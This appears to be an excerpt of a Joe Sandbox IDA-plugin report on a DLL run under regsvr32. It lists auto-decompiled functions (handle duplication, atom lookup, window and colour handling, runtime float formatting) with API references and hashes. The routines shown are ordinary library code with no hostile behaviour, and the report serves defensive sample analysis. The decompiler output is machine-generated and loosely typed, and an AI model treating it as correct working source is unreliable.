Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID:
API String ID: 1172841412-0
Opcode ID: de3799fe8e6c6327c776a7fcbf3e4f48c8dcf660d1fd7f7295f13f42e1e2f09e
Instruction ID: 5c356f81747dbbd8dc38ca80da6bd8a9e3226f835241aec0ff8917524533ee0f
Opcode Fuzzy Hash: de3799fe8e6c6327c776a7fcbf3e4f48c8dcf660d1fd7f7295f13f42e1e2f09e
Instruction Fuzzy Hash: B9019228E10359AEDF12EBF58845ADE7BBCEF04651F004086E801AF241EF74E74487D9

Uniqueness

Uniqueness Score: -1.00%

Function 1002962B Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1002962B(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				if(E10009F14(__eflags, 0x10) == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E100295EC(_t9);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					L10034B40(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

0x1002962e
0x10029633
0x1002963d
0x1002964a
0x1002964a
0x1002963f
0x10029646
0x10029646
0x1002965d
0x10029666
0x1002966e
0x1002966f
0x10029673
0x1002967b
0x1002967b
0x10029688
0x10029688
0x10029690
0x10029696
0x1002969e

APIs

Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 1002965D
GetCurrentProcess.KERNEL32(?,00000000), ref: 10029663
DuplicateHandle.KERNEL32 ref: 10029666
GetLastError.KERNEL32(?), ref: 10029681

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: 9b6f9dd5f042a9076f42e54c988969725293ae68f806c768e483a8899852132f
Instruction ID: 9a57ea4cd7946a0c25813fde5557cbd385d6f7a6745eee91706822166a40c99e
Opcode Fuzzy Hash: 9b6f9dd5f042a9076f42e54c988969725293ae68f806c768e483a8899852132f
Instruction Fuzzy Hash: 9C018F75700200BFEB11DBA5DD89F9ABBE9EF84790F148465FA05CB251DBB1EC008B60

Uniqueness

Uniqueness Score: -1.00%

Function 100220CD Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E100220CD(intOrPtr __edi, intOrPtr __esi, int _a4) {
				signed int _v8;
				char _v264;
				void* __ebx;
				signed int _t7;
				long _t11;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t22;
				signed int _t27;

				_t25 = __esi;
				_t23 = __edi;
				_t7 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t7 ^ _t27;
				if(GetAtomNameA(_a4,  &_v264, 0x100) == 0) {
					_push(__esi);
					_push(__edi);
					_t11 = GetLastError();
					if(_t11 == 0x7a || _t11 == 0xea || GlobalGetAtomNameA(_a4,  &_v264, 0x100) != 0) {
						L8:
						_t13 = 1;
					} else {
						_t17 = GetLastError();
						if(_t17 == 0x7a || _t17 == 0xea) {
							goto L8;
						} else {
							_t13 = 0;
						}
					}
					_pop(_t23);
					_pop(_t25);
				} else {
					_t13 = 1;
				}
				return E1004763E(_t13, 0x100, _v8 ^ _t27, _t22, _t23, _t25);
			}

0x100220cd
0x100220cd
0x100220d6
0x100220dd
0x100220f9
0x10022100
0x10022107
0x10022108
0x1002210d
0x1002213c
0x1002213e
0x1002212d
0x1002212d
0x10022132
0x00000000
0x10022138
0x10022138
0x10022138
0x10022132
0x1002213f
0x10022140
0x100220fb
0x100220fd
0x100220fd
0x1002214d

APIs

GetAtomNameA.KERNEL32(?,?,00000100), ref: 100220F1
GetLastError.KERNEL32 ref: 10022108
GlobalGetAtomNameA.KERNEL32(?,?,00000100), ref: 10022123
GetLastError.KERNEL32 ref: 1002212D

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AtomErrorLastName$Global
String ID:
API String ID: 815022922-0
Opcode ID: 3b690f861f08e89ab78d91b88308261db9ccfc801dcf7cd75de277a0a491c9aa
Instruction ID: ee492f502a4a9a34b43089ee40036339920e4bf53d98a0481bb42db3b440c012
Opcode Fuzzy Hash: 3b690f861f08e89ab78d91b88308261db9ccfc801dcf7cd75de277a0a491c9aa
Instruction Fuzzy Hash: 65018671B00114BBEB11DBB4EDC0EEE77EDDB1A340F6008B2EA46D2150EA74DD919761

Uniqueness

Uniqueness Score: -1.00%

Function 10046149 Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10046149(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				void* __edi;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t19;
				void* _t20;
				struct HWND__* _t22;
				struct HWND__* _t23;
				struct HWND__* _t26;

				_t20 = __edx;
				_t8 = _a8;
				_v12.x = _t8->x;
				_t19 = _t8->y;
				_push(_t19);
				_v12.y = _t19;
				_t9 = WindowFromPoint( *_t8);
				_t26 = _t9;
				if(_t26 != 0) {
					_t22 = GetParent(_t26);
					if(_t22 == 0 || E10021BD1(__ebx, _t20, _t22, _t22, 2) == 0) {
						ScreenToClient(_t26,  &_v12);
						_t23 = E10021C73(_t26, _v12.x, _v12.y);
						if(_t23 == 0) {
							L6:
							_t9 = _t26;
						} else {
							_t14 = IsWindowEnabled(_t23);
							_t9 = _t23;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t22;
					}
				}
				return _t9;
			}

0x10046149
0x1004614e
0x10046154
0x10046157
0x1004615a
0x1004615d
0x10046160
0x10046166
0x1004616a
0x10046174
0x10046178
0x1004618f
0x100461a1
0x100461a5
0x100461b4
0x100461b4
0x100461a7
0x100461a8
0x100461b0
0x100461b2
0x00000000
0x00000000
0x100461b2
0x10046186
0x10046186
0x10046186
0x100461b6
0x100461b9

APIs

WindowFromPoint.USER32 ref: 10046160
GetParent.USER32(00000000), ref: 1004616E
ScreenToClient.USER32(00000000,?), ref: 1004618F
IsWindowEnabled.USER32(00000000), ref: 100461A8

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ClientEnabledFromParentPointScreen
String ID:
API String ID: 1871804413-0
Opcode ID: 3627c711615e78e19aad3e618d6517063d8300fb1da98c20ae8f7686f437bd5c
Instruction ID: 1f6c813ac5b2d9a8c95957f1ec1c8b9de4531536b4a4b6380d21aba485b11546
Opcode Fuzzy Hash: 3627c711615e78e19aad3e618d6517063d8300fb1da98c20ae8f7686f437bd5c
Instruction Fuzzy Hash: 4101A779600511FFD706DB588D44DEE76B9EF8EA80B244165F901D3321FB30DD019BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10055DC6 Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10055DC6(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E1005566C(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E10055758(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E10055CB0(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E10055BDC(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x10055dc6
0x10055dc9
0x10055dcf
0x10055e42
0x00000000
0x10055dd6
0x10055dd6
0x10055dd9
0x10055df4
0x10055df7
0x10055e17
0x10055e29
0x10055df9
0x10055df9
0x10055dfc
0x00000000
0x10055dfe
0x10055e10
0x10055e10
0x10055dfc
0x10055e47
0x10055e4b
0x10055ddb
0x10055df3
0x10055df3
0x10055dd9

APIs

__cftof_l.LIBCMT ref: 10055DEA

Part of subcall function 10055BDC: __fltout2.LIBCMT ref: 10055C06

__cftog_l.LIBCMT ref: 10055E10
__cftoe_l.LIBCMT ref: 10055E42

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: f21a8b7f24a1b2d00343f0b603ae94f06ec36108a82eb02af9b45acdd94f1f67
Instruction ID: 600500aa65ffc26479830b01431e16f35ac0bba730854e645dd73247cfad11b1
Opcode Fuzzy Hash: f21a8b7f24a1b2d00343f0b603ae94f06ec36108a82eb02af9b45acdd94f1f67
Instruction Fuzzy Hash: 3E014B3641014ABBCF169E84DC228EE3F62FB08296F558415FA5899131D337DAB9AB81

Uniqueness

Uniqueness Score: -1.00%

Function 10014367 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10014367(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E10014367(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E10013FEA(_t13, _t14, _t18);
						}
						_t10 = E10014011(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10014367(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x10014367
0x10014367
0x10014372
0x10014378
0x1001437e
0x10014382
0x100143b2
0x100143b5
0x100143d2
0x100143d2
0x100143d4
0x100143d6
0x00000000
0x00000000
0x100143c0
0x100143c5
0x100143c7
0x100143cc
0x00000000
0x100143cc
0x00000000
0x100143c7
0x10014384
0x10014389
0x1001439b
0x1001439f
0x100143a0
0x00000000
0x100143a2
0x100143a9
0x100143ae
0x100143b0
0x00000000
0x00000000
0x1001438b
0x10014392
0x10014399
0x00000000
0x00000000
0x10014399
0x10014389
0x100143db
0x100143db

APIs

GetDlgItem.USER32(?,?), ref: 10014372
GetTopWindow.USER32(00000000), ref: 10014385

Part of subcall function 10014367: GetWindow.USER32(00000000,00000002), ref: 100143CC

GetTopWindow.USER32(?), ref: 100143B5

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: ac0814051f65bb9e564b276aa6b1d9ae16531019888a838dddd7f9f351e01bee
Instruction ID: 28477358267bbdc3cbc80c072941f90239b0d5c24e60e747c360d6ea668f4f31
Opcode Fuzzy Hash: ac0814051f65bb9e564b276aa6b1d9ae16531019888a838dddd7f9f351e01bee
Instruction Fuzzy Hash: 82016D36401667B7DB279FA18D04E8E3A99EF453E0F434020FD24AD130EF71DBA196A5

Uniqueness

Uniqueness Score: -1.00%

Function 1005803B Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E1005803B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x100b5ed0);
				E100491EC(__ebx, __edi, __esi);
				_t31 = E100516CA(__edx, __edi, _t35);
				_t15 =  *0x100bab24; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					L1004ED25(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x100baa28; // 0x26514a8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x100ba600;
								if(__eflags != 0) {
									_push(_t33);
									E100470E9(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x100baa28; // 0x26514a8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x100baa28; // 0x26514a8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100580D6();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E1004C299(_t25, _t29, _t31, 0x20);
				}
				return E10049231(_t33);
			}

0x1005803b
0x1005803b
0x1005803b
0x1005803b
0x1005803d
0x10058042
0x1005804c
0x1005804e
0x10058056
0x10058077
0x1005807d
0x10058081
0x10058084
0x10058087
0x1005808d
0x1005808f
0x10058091
0x10058094
0x1005809a
0x1005809c
0x1005809e
0x100580a4
0x100580a6
0x100580a7
0x100580ac
0x100580a4
0x1005809c
0x100580ad
0x100580b2
0x100580b5
0x100580bb
0x100580bf
0x100580bf
0x100580c5
0x100580cc
0x1005805e
0x1005805e
0x1005805e
0x10058063
0x10058067
0x1005806c
0x10058074

APIs

Part of subcall function 100516CA: __getptd_noexit.LIBCMT ref: 100516CB
Part of subcall function 100516CA: __amsg_exit.LIBCMT ref: 100516D8

__amsg_exit.LIBCMT ref: 10058067
__lock.LIBCMT ref: 10058077
InterlockedDecrement.KERNEL32(?), ref: 10058094
InterlockedIncrement.KERNEL32(026514A8), ref: 100580BF

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: d750480f2ed67ca9fda060e2d8013d0ebf7c7263f22f59e314d0f65cb8b0c4a1
Instruction ID: 2c66c78485f96dee5787b1674e8c8abefd5a4d64d588bf85caaf56f3e5aa2c90
Opcode Fuzzy Hash: d750480f2ed67ca9fda060e2d8013d0ebf7c7263f22f59e314d0f65cb8b0c4a1
Instruction Fuzzy Hash: 0B01ED39D00721ABEB90DB648845B9D73E0FB09761F200115EC00B32D0C734BE9ACBD2

Uniqueness

Uniqueness Score: -1.00%

Function 10009A9F Relevance: 6.0, APIs: 4, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E10009A9F(void* __ebx, void* __ecx, void* __edi, struct tagPOINT _a8, signed int _a12) {
				void* __ebp;
				int _t18;
				signed int _t23;
				void* _t36;
				void* _t37;
				void* _t38;

				_t36 = __edi;
				_t32 = __ecx;
				_t31 = __ebx;
				_push(_a12);
				_t37 = __ecx;
				_t18 = PtInRect(__ecx + 0x60, _a8.x);
				_t39 = _t18;
				if(_t18 == 0) {
					L10001262(_t37,  &_a8, _a8.x, _a12);
					_t34 =  *((intOrPtr*)(_t37 + 0x58));
					_t23 = _a12 * 0x18 + _a8;
					__eflags = _t23;
					 *((intOrPtr*)(_t37 + 0x5c)) =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x58)) + _t23 * 4));
					SendMessageA( *(E10013FEA(__ebx, _t34, _t38, GetParent( *(_t37 + 0x20))) + 0x20), 0x401, 1, 0);
				} else {
					 *(_t37 + 0x54) = 1;
					E10013FEA(__ebx, _t32, _t38, SetCapture( *(_t37 + 0x20)));
				}
				return E10013F46(_t31, _t37, _t36, _t39);
			}

0x10009a9f
0x10009a9f
0x10009a9f
0x10009aa3
0x10009aa6
0x10009aaf
0x10009ab5
0x10009ab7
0x10009add
0x10009ae5
0x10009aeb
0x10009aeb
0x10009af4
0x10009b0f
0x10009ab9
0x10009abc
0x10009aca
0x10009aca
0x10009b1e

APIs

PtInRect.USER32(?,?,?), ref: 10009AAF
SetCapture.USER32 ref: 10009AC3
GetParent.USER32(?), ref: 10009AF7
SendMessageA.USER32 ref: 10009B0F

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CaptureMessageParentRectSend
String ID:
API String ID: 2415874315-0
Opcode ID: 399e86d69f144f64d7a1cf1da985b58b00c05c7788515ef81abaed7b49b9f8e9
Instruction ID: 25e861961322638c5cc13c1cb93cfac8c952e232febe04a89418918ddb91ce9b
Opcode Fuzzy Hash: 399e86d69f144f64d7a1cf1da985b58b00c05c7788515ef81abaed7b49b9f8e9
Instruction Fuzzy Hash: 28017179604719EFEF109F60CC89E8A7BB9FF08714F008419F9468A661D776E520DF50

Uniqueness

Uniqueness Score: -1.00%

Function 100121B1 Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100121B1(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t21;
				void* _t22;
				void* _t23;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10021BD1(_t21, _t22, _t23, _a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}

0x100121bb
0x10012220
0x00000000
0x100121c3
0x100121c3
0x100121c9
0x00000000
0x100121e6
0x100121ef
0x100121fb
0x10012201
0x10012207
0x1001220b
0x1001220b
0x10012215
0x00000000
0x1001221d
0x100121c9

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 100121EF
SetBkColor.GDI32(00000000,00000000), ref: 100121FB
GetSysColor.USER32 ref: 1001220B
SetTextColor.GDI32(00000000,?), ref: 10012215

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$ObjectText
String ID:
API String ID: 829078354-0
Opcode ID: 056738f1dbb01ff9727d5d93c506c385d49c7b0d9dd5cda1d16c97d0f571fc3e
Instruction ID: 67b1fd4cb3906346164cf3f103316e4a66c3f8fc6138dac16c0a882264e53a5f
